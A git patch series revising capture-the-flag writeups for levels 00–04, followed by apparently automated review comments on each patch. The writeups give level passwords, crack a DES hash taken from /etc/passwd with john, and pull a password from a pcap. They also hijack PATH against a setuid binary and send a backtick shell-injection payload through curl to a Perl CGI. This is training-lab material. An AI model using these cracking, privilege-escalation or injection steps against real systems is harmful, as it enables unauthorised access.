From df11aa601f3927bcec4a83b5dfcea92fc88f8b8c Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:33:18 +0000 Subject: [PATCH 01/17] show READMEs daily --- README.mdx | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.mdx b/README.mdx index 2854845..a47a75c 100644 --- a/README.mdx +++ b/README.mdx @@ -29,7 +29,8 @@ Ideas - `id` `whoami` `id flag00` - we are level00 - another user flag00 has different permissions -- Let's compare their privileges: + +Let's compare privileges btw level00 and flag00: ```b > grep level00 /etc/passwd @@ -43,8 +44,7 @@ total 0 ls: cannot open directory /home/flag/flag00: Permission denied ``` -- `level00` has an empty Home directory -- Let's check if we have other files outside of Home +Let's check if we have other files outside of Home ```b > ls -l @@ -64,7 +64,7 @@ cdiiddwpgswtgt - `+` : forces `find` to run `cat` on many files at once -Decipher ___`cdiiddwpgswtgt`___ in python +Decipher _`cdiiddwpgswtgt`_ in python ```py a = ord('a') From 6f6963b3506f47e16d2b6e753f11c3d05c681477 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:35:49 +0100 Subject: [PATCH 02/17] Update README.mdx --- level00/README.mdx | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/level00/README.mdx b/level00/README.mdx index 06c5e90..714fec3 100644 --- a/level00/README.mdx +++ b/level00/README.mdx @@ -9,6 +9,13 @@ $ ssh level00@$(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}') -p 4242 # 00 +Login + +```b +> ssh level00@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: level00 +``` + Ideas - `ls` `pwd` From cdff689285b5796ab4894a233b1eb1f0a791bf33 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:36:05 +0000 Subject: [PATCH 03/17] show READMEs daily --- README.mdx | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/README.mdx b/README.mdx index a47a75c..8c5de05 100644 --- a/README.mdx +++ b/README.mdx 
@@ -22,6 +22,13 @@ $ ssh level00@$(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}') -p 4242 # 00 +Login + +```b +> ssh level00@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: level00 +``` + Ideas - `ls` `pwd` From 1455a7554cafc48a17855532a3103837b4aa0b31 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:53:53 +0100 Subject: [PATCH 04/17] Update README.mdx --- level01/README.mdx | 32 ++++++++++++++++++-------------- 1 file changed, 18 insertions(+), 14 deletions(-) diff --git a/level01/README.mdx b/level01/README.mdx index 8f7f8cc..e407b32 100644 --- a/level01/README.mdx +++ b/level01/README.mdx @@ -1,17 +1,29 @@ # 01 -- Legacy folder `/etc/passwd` +Login ```b -> cat /etc/passwd -> cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}' +> ssh level01@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: x24ti5gi3x0ol2eh4esiuxias +``` + +Idea + +- Look at `/etc/passwd` + +```b +> grep -i flag01 /etc/passwd +flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash +> grep flag01 /etc/passwd | awk -F: '{print $2}' +42hDRfypTqqnw ### observation - 😀 if we have john we'll able to do: + if we have john as a cli tool we'll able to one of these: + > john --show <(grep flag01 /etc/passwd | awk -F: '{print $2}') > john --show <(cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}') ``` -- Use `john` +- Download and use `john` ```b > wget https://download.openwall.net/pub/projects/john/contrib/macosx/john-1.8.0.9-jumbo-macosx_sse4.zip @@ -24,13 +36,5 @@ OR > ./do_john.sh -``` - -- token - -```b -> su flag01 -Password: abcdefg -> su level02 -> Password: f2av5il02puano7naaf6adaaf +> ?:abcdefg ``` From bac299fe222f01fa395c07c7e6ea40dbd203f205 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:54:05 +0100 Subject: [PATCH 05/17] Update README.mdx --- level01/README.mdx | 1 - 1 file changed, 1 deletion(-) 
diff --git a/level01/README.mdx b/level01/README.mdx index e407b32..5cfa69d 100644 --- a/level01/README.mdx +++ b/level01/README.mdx @@ -36,5 +36,4 @@ flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash OR > ./do_john.sh -> ?:abcdefg ``` From cfefff87fbf86a9816061efa072de66e7e108238 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:54:20 +0100 Subject: [PATCH 06/17] Update README.mdx --- level01/README.mdx | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/level01/README.mdx b/level01/README.mdx index 5cfa69d..5ac4739 100644 --- a/level01/README.mdx +++ b/level01/README.mdx @@ -7,9 +7,7 @@ Login > Password: x24ti5gi3x0ol2eh4esiuxias ``` -Idea - -- Look at `/etc/passwd` +Look at `/etc/passwd` ```b > grep -i flag01 /etc/passwd @@ -23,7 +21,7 @@ flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash > john --show <(cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}') ``` -- Download and use `john` +Download and use `john` ```b > wget https://download.openwall.net/pub/projects/john/contrib/macosx/john-1.8.0.9-jumbo-macosx_sse4.zip From 11bcbd6673ce1db3652f8d68dac9da80da4d8577 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:54:35 +0000 Subject: [PATCH 07/17] show READMEs daily --- README.mdx | 29 +++++++++++++++-------------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/README.mdx b/README.mdx index 8c5de05..8959d68 100644 --- a/README.mdx +++ b/README.mdx 
@@ -83,18 +83,28 @@ for i in range(26): # 01 -- Legacy folder `/etc/passwd` +Login + +```b +> ssh level01@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: x24ti5gi3x0ol2eh4esiuxias +``` + +Look at `/etc/passwd` ```b -> cat /etc/passwd -> cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}' +> grep -i flag01 /etc/passwd +flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash +> grep flag01 /etc/passwd | awk -F: '{print $2}' +42hDRfypTqqnw ### observation - 😀 if we have john we'll able to do: + if we have john as a cli tool we'll able to one of these: + > john --show <(grep flag01 /etc/passwd | awk -F: '{print $2}') > john --show <(cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}') ``` -- Use `john` +Download and use `john` ```b > wget https://download.openwall.net/pub/projects/john/contrib/macosx/john-1.8.0.9-jumbo-macosx_sse4.zip @@ -109,15 +119,6 @@ OR > ./do_john.sh ``` -- token - -```b -> su flag01 -Password: abcdefg -> su level02 -> Password: f2av5il02puano7naaf6adaaf -``` - # 02 From a2d58bee9ba4593d927b413b32986b94ce163b2e Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:55:32 +0100 Subject: [PATCH 08/17] Update README.mdx --- level02/README.mdx | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/level02/README.mdx b/level02/README.mdx index dd7c1e1..26f5a28 100644 --- a/level02/README.mdx +++ b/level02/README.mdx @@ -1,5 +1,12 @@ # 02 +Login + +```b +> ssh level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: f2av5il02puano7naaf6adaaf +``` + - New stuff - `realpath` - get the full absolute filepath - `scp` - secure copy - `scp username@ip:path _local_` @@ -73,12 +80,3 @@ print('res/', res) # ft_waNDReL0L ``` - -- token - -```b -> su flag02 -Password: ft_waNDReL0L -> su level03 -> Password: kooda2puivaav1idi4f57q8iq -``` From 9557c1bbcbca6fdff7b916498fd22c12dfb982a5 Mon Sep 17 00:00:00 2001 
From: nuoxoxo Date: Sun, 17 Nov 2024 16:55:46 +0000 Subject: [PATCH 09/17] show READMEs daily --- README.mdx | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/README.mdx b/README.mdx index 8959d68..f4e44a2 100644 --- a/README.mdx +++ b/README.mdx @@ -122,6 +122,13 @@ OR # 02 +Login + +```b +> ssh level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: f2av5il02puano7naaf6adaaf +``` + - New stuff - `realpath` - get the full absolute filepath - `scp` - secure copy - `scp username@ip:path _local_` @@ -196,15 +203,6 @@ print('res/', res) # ft_waNDReL0L ``` -- token - -```b -> su flag02 -Password: ft_waNDReL0L -> su level03 -> Password: kooda2puivaav1idi4f57q8iq -``` - # 03 From 51662fda925dd734e37540eba682ad069f70eb03 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:56:52 +0100 Subject: [PATCH 10/17] Update README.mdx --- level02/README.mdx | 20 +++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/level02/README.mdx b/level02/README.mdx index 26f5a28..8e3ccbd 100644 --- a/level02/README.mdx +++ b/level02/README.mdx @@ -7,12 +7,12 @@ Login > Password: f2av5il02puano7naaf6adaaf ``` -- New stuff - - `realpath` - get the full absolute filepath - - `scp` - secure copy - `scp username@ip:path _local_` - - `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring +New stuff +- `realpath` - get the full absolute filepath +- `scp` - secure copy - `scp username@ip:path _local_` +- `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring -- Save the `.pcap` to Host +Save the `.pcap` to Host ```b ### VM > ls -l @@ -22,7 +22,7 @@ Login > scp -P 4242 level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}'):/home/user/level02/level02.pcap $(pwd) ``` -- ❌ Inspect `.pcap` +❌ Inspect `.pcap` ```b ### Host 
@@ -32,9 +32,9 @@ Login > xxd level02.pcap | cut -d ' ' -f2-9 | tr -d ' ' ``` -- ✅ Use _Wireshark_ - - _Analyze - Follow - TCP Stream_ - - copy _`TCP Stream`_ to text +✅ Use _Wireshark_ +- _Analyze - Follow - TCP Stream_ +- copy _`TCP Stream`_ to text ```b 000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord: @@ -64,6 +64,8 @@ Login - `7f` - DE - `0d` - CR +Parse the above block + ```py infile = [[n[-2], n[-1]] for n in [_.split() for _ in open(0).read().split('\n') if len(_.split()) == 3]] res = '' From 0c01c9063a85bfe66cde4f9f589ca02d01dea8d2 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:57:09 +0000 Subject: [PATCH 11/17] show READMEs daily --- README.mdx | 20 +++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/README.mdx b/README.mdx index f4e44a2..4d0ca73 100644 --- a/README.mdx +++ b/README.mdx @@ -129,12 +129,12 @@ Login > Password: f2av5il02puano7naaf6adaaf ``` -- New stuff - - `realpath` - get the full absolute filepath - - `scp` - secure copy - `scp username@ip:path _local_` - - `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring +New stuff +- `realpath` - get the full absolute filepath +- `scp` - secure copy - `scp username@ip:path _local_` +- `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring -- Save the `.pcap` to Host +Save the `.pcap` to Host ```b ### VM > ls -l @@ -144,7 +144,7 @@ Login > scp -P 4242 level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}'):/home/user/level02/level02.pcap $(pwd) ``` -- ❌ Inspect `.pcap` +❌ Inspect `.pcap` ```b ### Host @@ -154,9 +154,9 @@ Login > xxd level02.pcap | cut -d ' ' -f2-9 | tr -d ' ' ``` -- ✅ Use _Wireshark_ - - _Analyze - Follow - TCP Stream_ - - copy _`TCP Stream`_ to text +✅ Use _Wireshark_ +- _Analyze - Follow - TCP Stream_ +- copy _`TCP Stream`_ to text ```b 000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord: 
@@ -186,6 +186,8 @@ Login - `7f` - DE - `0d` - CR +Parse the above block + ```py infile = [[n[-2], n[-1]] for n in [_.split() for _ in open(0).read().split('\n') if len(_.split()) == 3]] res = '' From 25ce324a9bf62d6dd39a357265525bc0b3a94859 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:57:36 +0100 Subject: [PATCH 12/17] Update README.mdx --- level03/README.mdx | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/level03/README.mdx b/level03/README.mdx index 3aa4197..abd2e92 100644 --- a/level03/README.mdx +++ b/level03/README.mdx @@ -1,8 +1,16 @@ # 03 -- Inspect - - ❌ `file` `readelf` `strings` - - ✅ `ltrace` +Login + +```b +> ssh level03@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: kooda2puivaav1idi4f57q8iq +``` + +Inspect +- ❌ `file` `readelf` `strings` +- ✅ `ltrace` + ``` > ls -l -rwsr-sr-x 1 flag03 level03 8627 level03 From 4c89535a2cf2d282e6159b4badf111396c31ecd5 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:57:47 +0100 Subject: [PATCH 13/17] Update README.mdx --- level03/README.mdx | 7 ------- 1 file changed, 7 deletions(-) diff --git a/level03/README.mdx b/level03/README.mdx index abd2e92..16bd35e 100644 --- a/level03/README.mdx +++ b/level03/README.mdx @@ -72,10 +72,3 @@ getflag: /bin/getflag > export PATH=/tmp:$PATH 👈 prepend tmp to get it checked first > ./level03 ``` - -- Token - -```b -> su level04 -> Password: qi0maab88jeaj46qoumi7maus -``` From 5d97a190ebc6c3b020cd42a424ca76286fde207a Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:58:02 +0000 Subject: [PATCH 14/17] show READMEs daily --- README.mdx | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/README.mdx b/README.mdx index 4d0ca73..3008c9c 100644 --- a/README.mdx +++ b/README.mdx 
@@ -208,9 +208,17 @@ print('res/', res) # 03 -- Inspect - - ❌ `file` `readelf` `strings` - - ✅ `ltrace` +Login + +```b +> ssh level03@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: kooda2puivaav1idi4f57q8iq +``` + +Inspect +- ❌ `file` `readelf` `strings` +- ✅ `ltrace` + ``` > ls -l -rwsr-sr-x 1 flag03 level03 8627 level03 @@ -273,13 +281,6 @@ getflag: /bin/getflag > ./level03 ``` -- Token - -```b -> su level04 -> Password: qi0maab88jeaj46qoumi7maus -``` - # 04 - Todo: perl script problem - understand the `.pl` From c4b1bf7962b4c082980e0e803d7886bf7d14e53b Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 18:44:55 +0100 Subject: [PATCH 15/17] Update README.mdx --- level04/README.mdx | 45 ++++++++++++++++++++++++++++++++++----------- 1 file changed, 34 insertions(+), 11 deletions(-) diff --git a/level04/README.mdx b/level04/README.mdx index 79cd3db..fbcfacc 100644 --- a/level04/README.mdx +++ b/level04/README.mdx 
@@ -1,17 +1,40 @@ -# 04 - Todo: perl script problem -- understand the `.pl` -- know `2>&1` -```b -> nc -vz localhost 4747 - 👆 v: verbose - z: scan if a port is open -Connection to localhost 4747 port [tcp/*] succeeded! +# 04 -> curl localhost:4747/?x="\`/bin/getflag\`" +Login + +> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: qi0maab88jeaj46qoumi7maus + +We have a script and maybe it interacts w/ a webpage: + +```pl +#!/usr/bin/perl +# localhost:4747 +use CGI qw{param}; + # CGI (Common Gateway Interface) + # param: a CGI module func fetches params from HTTP requests + # qw: quote words +print "Content-type: text/html\n\n"; +sub x { + $y = $_[0]; + print `echo $y 2>&1`; + # sub -- define subroutine x + # $_[0] -- subroutine `x()` takes a single arg` + # print w/ backticks invokes a shell command + # 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename +} +x(param("x")); + # 1st `x` : calling the subroutine + # 2nd `x` : a query param + # x comes in form of "...?x=getflag" ``` -- token +Solution ```b -su level05 -> Password: ne2searoevaevoem4ov4ar8ap +> nc -vz localhost 4747 + ^ v: verbose, z: scan if a port is open (scanning listening daemons) +Connection to localhost 4747 port [tcp/*] succeeded! + +> curl localhost:4747/?x="\`/bin/getflag\`" ``` From 3da1839618dc13ffcf003ae4f61d051ef361584d Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 18:45:09 +0100 Subject: [PATCH 16/17] Update README.mdx --- level04/README.mdx | 2 ++ 1 file changed, 2 insertions(+) diff --git a/level04/README.mdx b/level04/README.mdx index fbcfacc..e07e27a 100644 --- a/level04/README.mdx +++ b/level04/README.mdx @@ -2,8 +2,10 @@ Login +```b > ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 > Password: qi0maab88jeaj46qoumi7maus +``` We have a script and maybe it interacts w/ a webpage: From 255b51489d531edd0f3c135c1a10c5ec8b8c6f61 Mon Sep 17 00:00:00 2001 
From: nuoxoxo Date: Sun, 17 Nov 2024 17:45:24 +0000 Subject: [PATCH 17/17] show READMEs daily --- README.mdx | 45 +++++++++++++++++++++++++++++++++++---------- 1 file changed, 35 insertions(+), 10 deletions(-) diff --git a/README.mdx b/README.mdx index 3008c9c..9d2ded3 100644 --- a/README.mdx +++ b/README.mdx @@ -282,22 +282,47 @@ getflag: /bin/getflag ``` -# 04 - Todo: perl script problem -- understand the `.pl` -- know `2>&1` +# 04 + +Login + ```b -> nc -vz localhost 4747 - 👆 v: verbose - z: scan if a port is open -Connection to localhost 4747 port [tcp/*] succeeded! +> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: qi0maab88jeaj46qoumi7maus +``` -> curl localhost:4747/?x="\`/bin/getflag\`" +We have a script and maybe it interacts w/ a webpage: + +```pl +#!/usr/bin/perl +# localhost:4747 +use CGI qw{param}; + # CGI (Common Gateway Interface) + # param: a CGI module func fetches params from HTTP requests + # qw: quote words +print "Content-type: text/html\n\n"; +sub x { + $y = $_[0]; + print `echo $y 2>&1`; + # sub -- define subroutine x + # $_[0] -- subroutine `x()` takes a single arg` + # print w/ backticks invokes a shell command + # 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename +} +x(param("x")); + # 1st `x` : calling the subroutine + # 2nd `x` : a query param + # x comes in form of "...?x=getflag" ``` -- token +Solution ```b -su level05 -> Password: ne2searoevaevoem4ov4ar8ap +> nc -vz localhost 4747 + ^ v: verbose, z: scan if a port is open (scanning listening daemons) +Connection to localhost 4747 port [tcp/*] succeeded! + +> curl localhost:4747/?x="\`/bin/getflag\`" ```
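Review bot: In patch 01, hunk `@@ -29,7 +29,8 @@` of README.mdx, the new line "Let's compare privileges btw level00 and flag00:" uses "btw", which most readers parse as "by the way"; write "between". The fence tag on the context line that follows (```b) is not a language identifier that renderers or tooling recognise; since these blocks are shell sessions, tag them ```bash (or ```sh) consistently across the levels.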
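Review bot: In patch 01, hunk `@@ -43,8 +44,7 @@`, the removed bullet "`level00` has an empty Home directory" is the observation that justifies the next step, and the replacement sentence "Let's check if we have other files outside of Home" no longer says why. Keep the reasoning in the lead-in, e.g. "`level00`'s home is empty, so look for files owned by `flag00` elsewhere on the filesystem", so the `find` that follows reads as a consequence rather than a guess.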
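Review bot: In patch 02, the Login hunk of level00/README.mdx, `ssh level00@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242` selects whatever the second `inet ` line of the host's `ifconfig` happens to be, which depends on interface ordering and will silently pick the wrong address on another machine. State the assumption (port 4242 on the host's LAN interface is forwarded to the VM) or set the address once, e.g. `VM=$(ifconfig | ...)` and `ssh level00@$VM -p 4242`, and reuse `$VM` in the Login blocks of the later levels. Also, `> Password: level00` inside a prompt-style block reads as a command; mark it as a comment (`# password: level00`) so it is not copy-pasted into the shell.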
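Review bot: In patch 03 (and likewise 07, 09, 11, 14 and 17, the "show READMEs daily" commits), the hunk in README.mdx is a verbatim copy of the change made to the per-level file one commit earlier, so every edit in this series lands twice and has to be reviewed twice. If the root README.mdx is meant to be the concatenation of the `levelNN/README.mdx` files, generate it with a script (or a CI step) instead of mirroring by hand; otherwise the two copies will drift, as they already did between patch 15 (unfenced Login block) and its mirror.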
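Review bot: In patch 04, hunk `@@ -1,17 +1,29 @@` of level01/README.mdx, the `### observation` sentence and both `john --show` lines are inside the ```b fence opened before `grep -i flag01 /etc/passwd`, so the prose (including the slip "we'll able to one of these") ships as code. Close the fence after `42hDRfypTqqnw`, write the sentence as prose ("if `john` is installed we can run one of these"), and open a new fence for the commands. On the commands themselves: `john --show` only prints entries already cracked into `john.pot`, it does not crack anything, so the sequence has to be `john` on the hash first and `--show` afterwards. The 13-character field `42hDRfypTqqnw` is a traditional DES crypt hash stored in `/etc/passwd` instead of `/etc/shadow`, which is the actual weakness this level is about and worth one sentence; feed the whole `flag01:...` line rather than just field 2 (`grep flag01 /etc/passwd > hash.txt` then `john hash.txt`), so john keeps the username instead of printing `?:` as in the `?:abcdefg` line. The two grep invocations also differ (`grep -i flag01` vs `grep flag01`); pick one.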
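Review bot: In patch 04, hunk `@@ -24,13 +36,5 @@`, removing the block with `su flag01`, `Password: abcdefg` drops the step that turns the cracked password into the flag; the level02 password now appears in level02's Login block, but nothing in level01 says what to do with `abcdefg` once john returns it. Keep `su flag01` followed by the `getflag` call (level03's writeup already relies on `getflag`). The same applies to the removal hunks in patch 08 (`su flag02`) and patch 13 (`su level04`): drop the next level's password by all means, but keep the `su flagNN` / `getflag` step that completes the level.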
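Review bot: In patch 05, the hunk in level01/README.mdx removes `> ?:abcdefg`, which is the only line showing what john actually returned, one commit after patch 04 added it. Keep it as the verification that the method works (with a note that `?` is john's placeholder for a missing username), and squash this commit into 04 before merging.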
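Review bot: In patch 10, hunk `@@ -7,12 +7,12 @@` of level02/README.mdx, the de-indented bullet "`~.pcap` - a Packet Capture ..." still carries the `~`, which means "home directory" in this context; presumably `*.pcap` or just `.pcap` was intended. In the `scp` line in the same hunk's context, `$(pwd)` as the destination is just `.`; more useful would be to show the resulting local filename, and to note that `-P` (capital) is the port flag for `scp`, unlike `-p` for `ssh`, since the two commands sit next to each other with different case.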
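Review bot: In patch 10, hunk `@@ -64,6 +64,8 @@`, the new line "Parse the above block" should say how the script gets its input: `open(0)` on the next line reads the Wireshark "Follow TCP Stream" hex dump from stdin, so the usage is `python3 parse.py < stream.txt`, and the `len(_.split()) == 3` filter only keeps dump lines that have exactly three fields. The context bullet `- `7f` - DE` just above should read `DEL`: 0x7f is ASCII DEL, the key the user pressed to erase a typed character, and that is why the parser must discard the character before each `7f` to recover the password.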
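Review bot: In patch 12, the hunk in level03/README.mdx opens the block after "Inspect" with a bare ``` while every other session block in the series uses ```b; tag it the same way. The context line `-rwsr-sr-x 1 flag03 level03 8627 level03` is the key fact of the level (setuid and setgid bits, so the binary runs as `flag03`), and the Inspect list would be clearer if it said so in one sentence before recommending `ltrace`, rather than leaving the reader to spot the `s` in the mode string.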
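Review bot: In patch 15, hunk `@@ -1,17 +1,40 @@` of level04/README.mdx, the comment `# x comes in form of "...?x=getflag"` contradicts the Solution block: `?x=getflag` only makes the script echo the literal string "getflag". The injection works because Perl interpolates `$y` into the backtick string `` `echo $y 2>&1` `` before handing it to `/bin/sh`, so a value containing shell metacharacters (the backticks in `` `/bin/getflag` ``) is executed as a command under the CGI's user; change the comment to `...?x=`/bin/getflag`` and add that `$y` is never validated or escaped. Minor points in the same hunk: the comment `takes a single arg`` has a stray trailing backtick; the two Login lines are outside a fence (patch 16 fixes this, so squash 16 into 15); and the `curl localhost:4747/?x="\`/bin/getflag\`"` line leaves `?` unquoted, so quote the whole URL, e.g. `curl 'localhost:4747/?x=`/bin/getflag`'`, which also avoids the backslash escapes.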
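Review bot: In patch 16, the hunk in level04/README.mdx only adds the ```b fence that patch 15 forgot around the Login lines; this is a fix-up of the previous commit and should be squashed into it. Across the series, the commit message "Update README.mdx" repeated on patches 02, 04, 05, 06, 08, 10, 12, 13, 15 and 16 says nothing about what changed; use messages such as "level01: fence the john commands, drop token block" so the history is reviewable.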